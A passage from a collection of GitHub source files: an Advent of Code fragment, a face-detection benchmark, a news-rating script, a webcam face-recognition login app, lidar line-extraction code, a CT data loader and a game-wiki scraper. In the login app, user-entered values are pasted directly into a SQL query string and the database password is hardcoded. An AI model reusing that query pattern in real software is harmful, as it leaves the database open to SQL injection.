and pw[mx] != letter:\n numvalid += 1\n print(f\"{mn}, {mx}, {letter}, {pw}\")\n\n if pw[mn] != letter and pw[mx] == letter:\n numvalid += 1\n print(f\"{mn}, {mx}, {letter}, {pw}\")\n\n\nprint(f\"numvalid: {numvalid}\")\n","repo_name":"jobartucz/AdventOfCode-2020","sub_path":"day0202.py","file_name":"day0202.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16620583601","text":"import cv2\nimport time\nimport face_detection\nimport tqdm\n\n\nif __name__ == \"__main__\":\n num = 1000\n\n for detector in face_detection.available_detectors:\n detector = face_detection.build_detector(\n detector,\n fp16_inference=True\n )\n im = \"images/0_Parade_Parade_0_873.jpg\"\n im = cv2.imread(im)[:, :, ::-1]\n t = time.time()\n for i in tqdm.trange(num):\n dets = detector.detect(im)\n total_time = time.time() - t\n avg_time = total_time / num\n fps = 1 / avg_time\n ms = avg_time * 1000\n print(\n f\"Detector: {detector.__class__.__name__}. 
Average inference time over image shape: {im.shape} is:\",\n f\"{ms:.2f} ms, fps: {fps:.2f}\")\n","repo_name":"hukkelas/DSFD-Pytorch-Inference","sub_path":"benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"61"} +{"seq_id":"37031055318","text":"import asyncio\nimport logging\nfrom enum import Enum\n\nimport aiohttp\nimport anyio\nimport pymorphy2\nfrom async_timeout import timeout\n\nfrom jaundice_rate import adapters, text_tools\nfrom jaundice_rate.adapters.exceptions import ArticleNotFoundError, ResourceIsNotSupportedError\nfrom jaundice_rate.settings import TEST_JAUNDICE_ARTICLE_URLS\nfrom jaundice_rate.utils import calculation_time, read_charged_words\n\nlogger = logging.getLogger(__name__)\n\n\nclass ProcessingStatus(Enum):\n OK = 'OK'\n FETCH_ERROR = 'FETCH_ERROR'\n PARSING_ERROR = 'PARSING_ERROR'\n RESOURCE_IS_NOT_SUPPORTED = 'RESOURCE_IS_NOT_SUPPORTED'\n TIMEOUT = 'TIMEOUT'\n\n\nasync def fetch(session: aiohttp.ClientSession, url: str) -> str:\n async with session.get(url) as response:\n response.raise_for_status()\n return await response.text()\n\n\nasync def process_article(\n morph: pymorphy2.MorphAnalyzer,\n url: str,\n processed_articles: list[tuple],\n charged_words: set[str],\n session: aiohttp.ClientSession,\n) -> None:\n analysis_time = None\n get_analysis_time = None\n\n try:\n async with timeout(5):\n html_article = await fetch(session, url)\n\n sanitizer = adapters.get_sanitizer(url)\n article_text = sanitizer(html_article, True)\n\n try:\n with calculation_time() as get_analysis_time:\n async with timeout(3):\n article_words = await text_tools.split_by_words(morph, article_text)\n rating = await text_tools.calculate_jaundice_rate(article_words, charged_words)\n words_count = len(article_words)\n finally:\n if get_analysis_time is not None:\n analysis_time = get_analysis_time()\n\n except asyncio.exceptions.TimeoutError:\n return processed_articles.append(\n (url, None, None, ProcessingStatus.TIMEOUT.value, analysis_time),\n )\n except aiohttp.ClientError:\n return processed_articles.append(\n (url, None, None, ProcessingStatus.FETCH_ERROR.value, None),\n )\n except ArticleNotFoundError:\n return processed_articles.append(\n (url, None, None, ProcessingStatus.PARSING_ERROR.value, None),\n )\n except ResourceIsNotSupportedError:\n return processed_articles.append(\n (url, None, None, ProcessingStatus.RESOURCE_IS_NOT_SUPPORTED.value, None),\n )\n\n processed_articles.append( # noqa: RET503\n (url, rating, words_count, ProcessingStatus.OK.name, analysis_time),\n )\n\n\nasync def main() -> None:\n logging.basicConfig(level=logging.INFO, format='%(message)s')\n\n morph = pymorphy2.MorphAnalyzer()\n charged_words = await read_charged_words()\n processed_articles = []\n\n async with aiohttp.ClientSession() as session:\n async with anyio.create_task_group() as tg:\n for url in TEST_JAUNDICE_ARTICLE_URLS:\n tg.start_soon(\n process_article,\n morph,\n url,\n processed_articles,\n charged_words,\n session,\n )\n\n for url, rating, words_count, status, analysis_time in processed_articles:\n print( # noqa: T201\n f'{url}\\nСтатус: {status}\\nРейтинг: {rating}\\nКоличество слов: {words_count}',\n )\n logger.info('Analysis time: %s sec.\\n', analysis_time)\n\n\nif __name__ == '__main__':\n 
asyncio.run(main())\n","repo_name":"alexSmkh/jaundice-news-filter","sub_path":"jaundice_rate/jaundice_analysis.py","file_name":"jaundice_analysis.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38557436634","text":"import os.path\r\nimport subprocess\r\nimport tkinter as tk\r\nimport util\r\nimport cv2\r\nfrom PIL import Image,ImageTk\r\nimport datetime\r\nimport os\r\nimport mysql.connector\r\n\r\ndataBase = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"root\",\r\n passwd=\"admin\",\r\n database=\"damac\"\r\n)\r\n\r\n# preparing a cursor object\r\ncursorObject = dataBase.cursor()\r\n\r\nclass App:\r\n def __init__(self):\r\n self.main_window = tk.Tk()\r\n self.main_window.geometry('1200x520+350+100')\r\n self.login_button_main_window = util.get_button(self.main_window,\r\n 'login','green',self.login)\r\n self.login_button_main_window.place(x=750,y=300)\r\n self.register_button_main_window = util.get_button(self.main_window,\r\n 'register', 'gray',\r\n self.register_new_user,fg='black')\r\n\r\n self.register_button_main_window.place(x=750, y=400)\r\n\r\n self.webcam_label = util.get_img_label(self.main_window)\r\n\r\n self.webcam_label.place(x=10,y=0,width = 700,height = 500)\r\n self.add_webcam(self.webcam_label)\r\n\r\n self.db_dir = './db'\r\n if not os.path.exists(self.db_dir):\r\n os.mkdir(self.db_dir)\r\n\r\n self.log_path = './log.txt'\r\n def start(self):\r\n self.main_window.mainloop()\r\n\r\n def login(self):\r\n unknown_img_path = './.tmp.jpg'\r\n cv2.imwrite(unknown_img_path,self.most_recent_capture_arr)\r\n output = str(subprocess.check_output(['face_recognition', self.db_dir, unknown_img_path]))\r\n name = output.split(',')[-1][:-5]\r\n print(name)\r\n # the face_recognition CLI reports 'unknown_person' for unmatched faces; the misspelling 'uknown_person' never matched, so strangers were greeted as logged in\r\n if name in ['unknown_person','no_persons_found']:\r\n util.msg_box('Error','User not found, Please register or try again')\r\n else:\r\n util.msg_box('Successful Login',f'Welcome back, {name}')\r\n with open(self.log_path,'a') as f:\r\n f.write(f'{name}, {datetime.datetime.now()}\\n')\r\n os.remove(unknown_img_path)\r\n\r\n def register_new_user(self):\r\n self.register_new_user_window = tk.Toplevel(self.main_window)\r\n self.register_new_user_window.geometry('1200x920+370+120')\r\n\r\n self.accept_button_register_new_user_window = util.get_button(self.register_new_user_window,\r\n 'Confirm', 'green', self.confirm_register_new_user)\r\n self.accept_button_register_new_user_window.place(x=750, y=400)\r\n\r\n self.tryagain_button_register_new_user_window = util.get_button(self.register_new_user_window,\r\n 'try again', 'red', self.tryagain_register_new_user)\r\n self.tryagain_button_register_new_user_window.place(x=750, y=500)\r\n\r\n self.capture_label = util.get_img_label(self.register_new_user_window)\r\n\r\n self.capture_label.place(x=10, y=0, width=700, height=500)\r\n\r\n self.add_img_to_label(self.capture_label)\r\n\r\n self.name_input = util.get_entry_text(self.register_new_user_window)\r\n self.name_input.place(x=750,y=90)\r\n\r\n self.name_input_label = util.get_text_label(self.register_new_user_window,'Enter name: ')\r\n self.name_input_label.place(x=750,y=30)\r\n\r\n self.cluster_input = util.get_entry_text(self.register_new_user_window)\r\n self.cluster_input.place(x=750, y=210)\r\n\r\n self.cluster_input_label = util.get_text_label(self.register_new_user_window, 'Enter cluster: ')\r\n self.cluster_input_label.place(x=750, y=150)\r\n\r\n self.villa_input = 
util.get_entry_text(self.register_new_user_window)\r\n self.villa_input.place(x=750, y=330)\r\n\r\n self.villa_input_label = util.get_text_label(self.register_new_user_window, 'Enter villa number: ')\r\n self.villa_input_label.place(x=750, y=270)\r\n\r\n def confirm_register_new_user(self):\r\n name = self.name_input.get(1.0,\"end-1c\")\r\n cluster = self.cluster_input.get(1.0, \"end-1c\")\r\n villa_number = self.villa_input.get(1.0, \"end-1c\")\r\n\r\n registered = self.user_already_registered(name,cluster,villa_number)\r\n if registered:\r\n\r\n util.msg_box('ERROR','User has already been registered, Please login')\r\n self.register_new_user_window.destroy()\r\n return\r\n\r\n self.add_usertoDB(name,cluster,villa_number)\r\n\r\n cv2.imwrite(os.path.join(self.db_dir,f'{name}.jpg'),self.register_new_user_capture)\r\n\r\n util.msg_box('Success','The user has been registered successfully')\r\n\r\n self.register_new_user_window.destroy()\r\n\r\n def user_already_registered(self,name,cluster,villa_number):\r\n query = f\"SELECT * FROM users where name='{name}' and cluster='{cluster}' and villa_no={villa_number} \"\r\n cursorObject.execute(query)\r\n\r\n myresult = cursorObject.fetchall()\r\n if myresult:\r\n return True\r\n return False\r\n\r\n def add_usertoDB(self,name,cluster,villa_number):\r\n sql = \"INSERT INTO users (name, cluster, villa_no)\\\r\n VALUES (%s, %s, %s)\"\r\n val = (name,cluster,villa_number)\r\n\r\n cursorObject.execute(sql, val)\r\n dataBase.commit()\r\n def tryagain_register_new_user(self):\r\n self.register_new_user_window.destroy()\r\n\r\n def add_img_to_label(self,label):\r\n imgtk = ImageTk.PhotoImage(image=self.most_recent_capture_pil)\r\n\r\n label.imgtk = imgtk\r\n label.configure(image=imgtk)\r\n\r\n self.register_new_user_capture = self.most_recent_capture_arr.copy()\r\n\r\n\r\n def add_webcam(self,label):\r\n if 'cap' not in self.__dict__:\r\n self.cap = cv2.VideoCapture(0)\r\n self._label = label\r\n self.process_webcam()\r\n\r\n def process_webcam(self):\r\n ret ,frame = self.cap.read()\r\n self.most_recent_capture_arr = frame\r\n\r\n img_ = cv2.cvtColor(self.most_recent_capture_arr, cv2.COLOR_BGR2RGB)\r\n self.most_recent_capture_pil = Image.fromarray(img_)\r\n\r\n imgtk = ImageTk.PhotoImage(image=self.most_recent_capture_pil)\r\n\r\n self._label.imgtk = imgtk\r\n self._label.configure(image=imgtk)\r\n self._label.after(20, self.process_webcam)\r\n\r\n\r\nif __name__=='__main__':\r\n app = App()\r\n app.start()\r\n dataBase.close()\r\n","repo_name":"AeroArtz/Face-Recognition-System","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41090978165","text":"import time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport cv2\n\ndef line_equation(p1, p2):\n slope= (p2[1] - p1[1])/(p2[0] - p1[0])\n intercept= p1[1] - slope* p1[0]\n return [slope, intercept]\n\ndef calcul_dist(line, p):\n return np.abs( ( -line[0]* p[0] + p[1] - line[1] ) / ( np.sqrt( line[0]**2 + 1 ) ) )\n\ndef polarToCartesian(p):\n x = p[1] * np.cos(p[0])\n y = p[1] * np.sin(p[0])\n return np.array([x, y])\n\ndef cartesianToPolar(p):\n rho = np.sqrt(p[0]**2 + p[1]**2)\n theta = np.arctan2(p[1], p[0])\n return np.array([theta, rho])\n\ndef most_distant (points, line):\n d = 0\n k=0\n for i in range(1, points.shape[1]):\n dist = calcul_dist(line, points[:, i])\n if dist > d:\n d = dist\n k = i\n return d, k\n\ndef 
split(points_cartesian, line, threshold_split, p1, p2):\n d, k = most_distant(points_cartesian, line)\n global p_mosts\n\n if d > threshold_split:\n p_most = points_cartesian[:, k]\n p_mosts = np.vstack([p_mosts, p_most])\n\n points_split_left = points_cartesian[:, :k]\n points_split_right = points_cartesian[:, k:]\n\n line_left = line_equation(p1, p_most)\n line_right = line_equation(p2, p_most)\n\n split(points_split_left, line_left, threshold_split, p1, p_most)\n split(points_split_right, line_right, threshold_split, p_most, p2)\n return 0\n\n\n############################################################### Getting data #############################################################################\nthreshold_split = 0.05\nthreshold_merge = 0.1\nthreshold_noise = 0.5\n\ndata= pd.read_csv('data.csv', sep=';')\nrho = np.transpose(np.array(data.iloc[9: , 0].values))\nincrement = data.iloc[4, 0]\nincrements = np.zeros([rho.shape[0]])\nincrements[0]= data.iloc[2, 0]\n\nfor i in range(1, increments.shape[0]):\n increments[i]= increments[i-1] + increment\npoints = np.vstack([increments, rho])\npoints = points[:, ~np.isnan(points).any(axis=0)]\n\n############################################################## Removing noise ###########################################################################\ninds = []\ni=0\nwhile i < (points.shape[1] - 1):\n j = 1\n while (np.abs(points[1, j+i] - points[1, i+j-1]) < threshold_noise) and j+i < points.shape[1]-1:\n j += 1\n\n if j < 50:\n for k in range(j):\n inds.append(i+k)\n i = i + j\n\npoints = np.delete(points, (inds), axis=1)\n\n\n#########################################################################################################################################################\n##################################################################### split and merge ####################################################################\n##########################################################################################################################################################\n\nstart = time.time()\n\np1 = polarToCartesian(points[:, 0])\np2 = polarToCartesian(points[:, -1])\nline = line_equation(p1, p2)\npoints_cartesian = np.zeros(points.shape)\n\nfor i in range(points.shape[1]):\n points_cartesian[:, i] = polarToCartesian(points[:, i])\n##################################################### Splitting and sorting the resulting points ##########################################################\np_mosts = np.zeros(2)\nsplit(points_cartesian, line, threshold_split, p1, p2)\np_mosts = np.delete(p_mosts, (0), axis=0)\np_mosts = np.vstack([p_mosts, p2])\np_mosts = np.vstack([p1, p_mosts])\n\np_mosts_polar = np.zeros(p_mosts.shape)\nfor i in range(p_mosts.shape[0]):\n p_mosts_polar[i, :] = cartesianToPolar(p_mosts[i, :])\np_mosts_polar = p_mosts_polar[np.argsort(p_mosts_polar[:, 0]), :]\n\np_mosts_cartesian = np.zeros(p_mosts.shape)\nfor i in range(p_mosts.shape[0]):\n p_mosts_cartesian[i, :] = polarToCartesian(p_mosts_polar[i, :])\n\n############################################################# creating the lines and Merging #################################################################\ninds = []\nlines = []\nfor i in range(p_mosts_cartesian.shape[0]-1):\n line = line_equation(p_mosts_cartesian[i, :], p_mosts_cartesian[i + 1, :])\n\n if i > 1:\n if np.abs(np.abs(line[0]) - np.abs(lines[-1][0])) < threshold_merge :\n line = line_equation(p_mosts_cartesian[i-1, :], p_mosts_cartesian[i + 1, :])\n lines[-1] = line\n inds.append(i)\n else:\n 
lines.append(line)\n else:\n lines.append(line)\np_mosts_cartesian = np.delete(p_mosts_cartesian, (inds), axis=0)\n\n############################################################## Plotting the final lines ######################################################################\nplt.scatter( p_mosts[:, 0] , p_mosts[:, 1] ,c = \"r\", linewidth=2, label='lines_edges')\nplt.scatter(points_cartesian[0, :], points_cartesian[1, :], c = \"g\", linewidth = 0.5, label = 'point cloud')\nfor i in range(p_mosts_cartesian.shape[0] - 1):\n x_range = (p_mosts_cartesian[i, 0], p_mosts_cartesian[i+1, 0])\n plt.plot([x_range[0], x_range[1]], [x_range[0]*lines[i][0] + lines[i][1], x_range[1]*lines[i][0] + lines[i][1]], c = \"r\", linewidth=2)\n plt.title('Split and merge')\n plt.legend()\nplt.show()\n\nend = time.time()\ntime_split = end-start\n\n##########################################################################################################################################################\n##################################################################### line regression ####################################################################\n##########################################################################################################################################################\n\n\ndef line_least_square(p):\n y= p[1, :]\n x= p[0, :]\n mean_x = np.mean(x)\n mean_y = np.mean(y)\n slope = np.dot((x - mean_x), (y - mean_y))/np.dot ((x - mean_x), (x - mean_x))\n intercept = mean_y - slope * mean_x\n return [slope , intercept]\n\ndef mahalanobis_dist (window1 , window2):\n y1 = window1[1, :] - np.mean(window1[1, :])\n x1 = window1[0, :] - np.mean(window1[0, :])\n y2 = window2[1, :] - np.mean(window2[1, :])\n x2 = window2[0, :] - np.mean(window2[0, :])\n\n u1 = np.hstack([x1, y1])\n u2 = np.hstack([x2, y2])\n cov = np.outer(u1, np.transpose(u2))\n dist = np.sqrt( np.dot(np.transpose(u1) , np.dot( np.linalg.inv(cov), u2 ) ))\n return dist\n\nstart = time.time()\n################################################################## fit line in a window ####################################################################\nNf= 7\nwindow = points_cartesian[:, :Nf]\nline = line_least_square(window)\n\n########################################################### Building the line and the fidelity array ######################################################\nlines = [line]\nfidelity_array = []\nfor i in range(1, points_cartesian.shape[1] - Nf-1):\n window1 = points_cartesian[:, i-1 : i + Nf]\n window2 = points_cartesian[:, i-1 + 1 : i + Nf + 1]\n\n lines.append(np.array(line_least_square(window1)))\n fidelity_array.append( mahalanobis_dist(window1, window2) )\n\n################################################################## Clustering and merging lines #############################################################\ni = 0\nj = 1\nplt.scatter(points_cartesian[0, :], points_cartesian[1, :], c = \"g\", linewidth = 0.05, label = 'point cloud')\nwhile i + j < len(fidelity_array):\n j = 1\n if not (np.isnan(fidelity_array[i]) ):\n while not(np.isnan(fidelity_array[i + j]) ):\n if (i + j < len(fidelity_array) - 1):\n j += 1\n else:\n break\n window = points_cartesian[:, i: i + j * Nf]\n line = line_least_square(window)\n x_range = (window[0, 0], window[0, -1])\n plt.plot([x_range[0], x_range[1]], [x_range[0] * line[0] + line[1], x_range[1] * line[0] + line[1]], c=\"b\", linewidth=2)\n i = i+ j\nplt.legend()\nplt.title('Line regression')\nplt.show()\n\nend = time.time()\ntime_reg = 
end-start\n\n##########################################################################################################################################################\n##################################################################### Hough transform ####################################################################\n##########################################################################################################################################################\n\n\ndef cartesianToPixel(p, range_x, range_y, x_neg, y_neg):\n return [ int( (p[0] - x_neg) * 500 / range_x), int((p[1] - y_neg) * 500 / range_y ) ]\n\nstart = time.time()\n\nx_neg = np.min(points_cartesian[0, :])\ny_neg = np.min(points_cartesian[1, :])\nrange_x = np.max(points_cartesian[0, :]) - np.min(points_cartesian[0, :])\nrange_y = np.max(points_cartesian[1, :]) - np.min(points_cartesian[1, :])\n\n\nimage = np.zeros([800, 800])\nfor i in range(points_cartesian.shape[1]):\n image[ 500 +100 - cartesianToPixel(points_cartesian[:, i], range_x, range_y, x_neg, y_neg)[1], 150 + cartesianToPixel(points_cartesian[:, i], range_x, range_y, x_neg, y_neg)[0] ] = 255\n\ncv2.imwrite(\"tmp.png\", image)\nimage = cv2.imread(\"tmp.png\")\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\nkernel = np.ones((3, 3), np.uint8)\ngray = cv2.dilate(gray, kernel, iterations=1)\nthresold_theta_min = 3 * np.pi /180\n\nlines = cv2.HoughLines(gray,0.5,np.pi/180, 30)\nthetas = []\n\nfor line in lines:\n for rho,theta in line:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a*rho\n y0 = b*rho\n x1 = int(x0 + 1000*(-b))\n y1 = int(y0 + 1000*(a))\n x2 = int(x0 - 1000*(-b))\n y2 = int(y0 - 1000*(a))\n\n if not (sum(abs (np.abs(thetas) - np.abs(theta)) < thresold_theta_min) > 0 ) and len(thetas)> 0 or len(thetas)==0:\n cv2.line(image,(x1,y1),(x2,y2),(0,0,255),2)\n thetas.append(theta)\n\n# cv2.imshow(\"figure\", image)\n# cv2.waitKey()\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\nplt.imshow(image)\nplt.legend()\nplt.title('Hough transform')\nplt.show()\n\nend = time.time()\ntime_Hough = end-start\n\n################################################################# Checking the time of executions ######################################################\nfig, ax = plt.subplots()\nind = np.arange(1, 4)\ns, h, r = plt.bar(ind, [time_split, time_Hough, time_reg])\ns.set_facecolor('g')\nh.set_facecolor('b')\nr.set_facecolor('r')\nax.set_xticks(ind)\nax.set_xticklabels(['Split and Merge', 'Hough Transform', 'Line Regression'])\nax.set_ylabel('Seconds')\nax.set_title('Line Extraction Algorithm')\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"samysellami/Intelligent-mobile-robotics","sub_path":"Assignment2/Code_python/Line_extraction.py","file_name":"Line_extraction.py","file_ext":"py","file_size_in_byte":10666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74246390275","text":"import os\nimport torch\nimport numpy as np\nfrom torchvision import transforms\nfrom glob import glob\nfrom torch.utils.data import Dataset, DataLoader\n\n\nclass ct_dataset(Dataset):\n def __init__(self, mode, load_mode, train_path, saved_path, test_patient, \n patch_n=None, patch_size=None, transform=None, norm = False, patch_training = False):\n assert mode in ['train', 'test'], \"mode is 'train' or 'test'\"\n assert load_mode in [0,1], \"load_mode is 0 or 1\"\n\n input_path = sorted(glob(os.path.join(saved_path, '*_input*.npy'))) # glob遍历文件夹下所有文件或文件夹;sorted对所有可迭代的对象进行排序操作\n target_path = 
sorted(glob(os.path.join(saved_path, '*_target*.npy')))\n self.load_mode = load_mode\n self.patch_n = patch_n\n self.patch_size = patch_size\n self.patch_training = patch_training\n self.transform = transform\n self.norm = norm\n self.mode = mode\n\n if mode == 'train':\n # ugly refactoring\n input_path = sorted(glob(os.path.join(train_path, 'data', '*.npy')))\n target_path = sorted(glob(os.path.join(train_path, 'label', '*.npy')))\n input_ = [f for f in input_path]\n target_ = [f for f in target_path]\n if load_mode == 0: # batch data load\n self.input_ = input_\n self.target_ = target_\n else: # all data load\n self.input_ = [np.load(f) for f in input_]\n self.target_ = [np.load(f) for f in target_]\n else: # mode =='test'\n input_ = [f for f in input_path if test_patient in f]\n target_ = [f for f in target_path if test_patient in f]\n if load_mode == 0: # batch data load\n self.input_ = input_\n self.target_ = target_\n else: # all data load\n self.input_ = [np.load(f) for f in input_]\n self.target_ = [np.load(f) for f in target_]\n \n\n def __len__(self):\n return len(self.target_)\n\n def __getitem__(self, idx):\n input_img, target_img = self.input_[idx], self.target_[idx]\n if self.load_mode == 0:\n input_img, target_img = np.load(input_img), np.load(target_img)\n \n # do normalization\n if self.norm:\n input_mean, input_std = np.mean(input_img), np.std(input_img)\n target_mean, target_std = np.mean(target_img), np.std(target_img)\n input_img = (input_img - input_mean) / input_std\n target_img = (target_img - target_mean) / target_std\n\n # if self.mode == 'train' and self.transform:\n # input_img = self.preprocess(input_img)\n # target_img = self.preprocess(target_img)\n\n\n if self.mode == 'train' and self.patch_training:\n input_patches, target_patches = get_patch(input_img,\n target_img,\n self.patch_n,\n self.patch_size)\n return (input_patches, target_patches)\n else:\n return (input_img, target_img)\n\n\ndef get_patch(full_input_img, full_target_img, patch_n, patch_size): # 定义patch\n assert full_input_img.shape == full_target_img.shape\n patch_input_imgs = []\n patch_target_imgs = []\n h, w = full_input_img.shape\n new_h, new_w = patch_size, patch_size\n for _ in range(patch_n):\n top = np.random.randint(0, h-new_h)\n left = np.random.randint(0, w-new_w)\n patch_input_img = full_input_img[top:top+new_h, left:left+new_w]\n patch_target_img = full_target_img[top:top+new_h, left:left+new_w]\n patch_input_imgs.append(patch_input_img)\n patch_target_imgs.append(patch_target_img)\n return np.array(patch_input_imgs), np.array(patch_target_imgs)\n\n\ndef get_loader(mode='train', load_mode=0, train_path = None,\n saved_path=None, test_patient='LDCT',\n patch_n=None, patch_size=None,\n transform=None, batch_size=32, \n num_workers=6, norm = False, patch_training = False):\n train_dataset= ct_dataset('train', load_mode, train_path, saved_path, test_patient, patch_n, patch_size, transform, norm, patch_training)\n train_data_loader = DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=False, num_workers=num_workers) \n\n test_dataset = ct_dataset('test', load_mode, train_path, saved_path, test_patient, patch_n, patch_size, transform, norm, False)\n test_data_loader = DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=False, num_workers=num_workers) \n return train_data_loader, 
test_data_loader\n","repo_name":"imabackstabber/CT_DIY","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":4780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12445165539","text":"import pandas\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom bs4 import BeautifulSoup as BS\nimport time\nimport requests\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom ComFunc import *\nmainUrl = 'https://grandislibrary.com'\nclassesUrl = 'https://grandislibrary.com/classes'\n\n\n\n\ndef StartScraping():\n start = time.time()\n CharacterDF, UnionDF, MWeaponDF, SWeaponDF = navigateClasses()\n \n CharacterDF = cleanCharDF(CharacterDF)\n \n UnionDF = cleanUDF(UnionDF)\n\n CharacterDF.to_csv('DefaultData\\\\CharacterData\\\\CharacterData.csv')\n UnionDF.to_csv('DefaultData\\\\CharacterData\\\\UnionData.csv')\n MWeaponDF.to_csv('DefaultData\\\\CharacterData\\\\ClassMainWeapon.csv')\n SWeaponDF.to_csv('DefaultData\\\\CharacterData\\\\ClassSecWeapon.csv')\n\n \n end = time.time()\n print(f'Total time taken: {end-start}')\n return\n\ndef navigateClasses():\n\n browser = webdriver.Chrome(ChromeDriverManager().install())\n\n browser.get(classesUrl)\n\n browser = scrollDown(browser, 10)\n \n lazyLoadDiv = browser.find_elements(By.CLASS_NAME, 'lazyload-wrapper')\n \n ClassesLinks = []\n for a in lazyLoadDiv:\n classChunkList = a.find_elements_by_tag_name('a')\n for link in classChunkList:\n ClassesLinks.append(link.get_attribute('href'))\n \n\n browser.close()\n \n \n request_session = requests.session()\n CharacterDF = pandas.DataFrame()\n UnionDF = pandas.DataFrame()\n ClassMWeaponDF = pandas.DataFrame()\n ClassSWeaponDF = pandas.DataFrame()\n \n ignoreClasses = ['Beast-Tamer', 'Jett']\n for link in ClassesLinks:\n if any(c.lower() in link.lower() for c in ignoreClasses) == True:\n continue\n \n charCollection = retrieveClassPage(link, request_session)\n CharacterDF = CharacterDF.append(charCollection[0], ignore_index=True)\n UnionDF = UnionDF.append(charCollection[1],ignore_index=True)\n ClassMWeaponDF = ClassMWeaponDF.append(charCollection[2], ignore_index=True)\n ClassSWeaponDF = ClassSWeaponDF.append(charCollection[3], ignore_index=True)\n\n \n return CharacterDF, UnionDF, ClassMWeaponDF, ClassSWeaponDF\n\ndef scrollDown(browser, noOfScrollDown):\n \n body = browser.find_element_by_tag_name(\"body\")\n \n while noOfScrollDown >=0:\n body.send_keys(Keys.PAGE_DOWN)\n noOfScrollDown -=1\n \n \n \n return browser\n \ndef retrieveClassPage(subUrl, session):\n start = time.time()\n PageContent = session.get(subUrl)\n \n MainContent = BS(PageContent.content, 'lxml')\n ClassName = MainContent.find('h1').next\n\n ClassDetailsTable = MainContent.find_all('tbody')[0].find_all('tr')\n \n if ClassName.find(\"Fire\") != -1 and ClassName.find('Poison') != -1:\n ClassName = 'Fire Poision'\n elif ClassName.find(\"Ice\") != -1 and ClassName.find('Lightning') != -1:\n ClassName = 'Ice Lightning'\n \n ResistanceGrp = ['Demon', 'Xenon']\n specialMod = [',', '+']\n CS = {}\n CS['ClassName'] = ClassName\n for tr in ClassDetailsTable:\n th = tr.find('th')\n td = tr.find('td')\n if th.get_text().find('Class Group') != -1:\n \n faction = removeN(td.next, '\\n')\n if any(c.lower() in faction.lower() for c in ResistanceGrp) == True:\n faction = 'Resistance'\n elif ClassName == 'Zero':\n faction = 'Transcendant'\n elif ClassName == 'Kinesis':\n faction 
= 'FriendStory'\n CS['Faction'] = faction\n \n elif th.get_text().find('Job Group') != -1:\n CT = td.next\n if any(m in td.get_text() for m in specialMod) == True:\n CT = 'SPECIAL'\n CS['ClassType'] = CT\n elif th.get_text().find('Primary Stat') != -1:\n stat = td.next\n if any(m in td.get_text() for m in specialMod) == True:\n stat = 'SPECIAL'\n CS['MainStat'] = stat\n elif th.get_text().find('Secondary Stat') != -1:\n stat = td.next\n if any(m in td.get_text() for m in specialMod) == True:\n stat = 'SPECIAL'\n if td.get_text() == \"-\" and CS['ClassName'] == \"Demon Avenger\":\n stat = \"STR\"\n \n CS['SecStat'] = stat\n \n elif th.get_text().find('Legion') != -1:\n UET = 'FLAT'\n UE = removeN(td.contents[0].get_text(), [',', 'and'])\n UES = td.contents[1].get_text()\n UES = removeN(UES, [\"+\",\"(\", \")\"])\n UES = UES.split('/')\n \n if UES[-1].find('%') != -1:\n UET = 'PERC'\n UES[-1] =UES[-1].split('%')[0]\n\n if UE.find('%') != -1:\n UE = UE.split('%')[1]\n if UE.find('(') != -1:\n UE = UE.split('(')[0] \n\n CS['UnionEffect'] = UE\n CS['UnionEffectStat'] = UES\n CS['UnionEffectType'] = UET\n elif th.get_text().find('Weapon') != -1:\n WeaponList = []\n \n if \"PWeap\" in CS:\n for weap in td:\n t = removeN(weap.get_text(), '\\n')\n if ClassName == 'Zero':\n t = 'Heavy Sword'\n WeaponList.append(removeFLSpace(t))\n CS['SWeap'] = WeaponList\n else:\n for weap in td:\n t = removeN(weap.get_text(), '\\n')\n t = t[1:] if t[0] == ' ' else t\n if ClassName == 'Zero':\n t = 'Long Sword'\n WeaponList.append(t)\n CS['PWeap'] = WeaponList \n\n UnionD = {\n 'Effect' : CS['UnionEffect'],\n 'Rank B' : CS['UnionEffectStat'][0],\n 'Rank A' : CS['UnionEffectStat'][1],\n 'Rank S' : CS['UnionEffectStat'][2],\n 'Rank SS' : CS['UnionEffectStat'][3],\n 'Rank SSS' : CS['UnionEffectStat'][4],\n 'EffectType' : CS['UnionEffectType']\n }\n UnionDF = pandas.DataFrame(\n UnionD, index = [0]\n )\n CS.pop('UnionEffectStat')\n \n tempJ = []\n tempW = []\n for w in CS['PWeap']:\n tempJ.append(CS['ClassName'])\n tempW.append(w)\n MWeapon = {\n 'ClassName' : tempJ ,\n 'WeaponType' : tempW\n }\n ClassMWeaponDF = pandas.DataFrame(\n MWeapon \n )\n CS.pop('PWeap')\n tempJ = []\n tempW = []\n for w in CS['SWeap']:\n tempJ.append(CS['ClassName'])\n tempW.append(w)\n SWeapon = {\n 'ClassName' : tempJ ,\n 'WeaponType' : tempW\n }\n ClassSWeaponDF = pandas.DataFrame(\n SWeapon\n )\n \n CS.pop('SWeap')\n \n CharacterDF = pandas.DataFrame(CS, index=[0])\n\n smallCollection = [CharacterDF, UnionDF, ClassMWeaponDF, ClassSWeaponDF]\n \n end = time.time()\n print(f' {ClassName} added in {end-start}') \n \n return 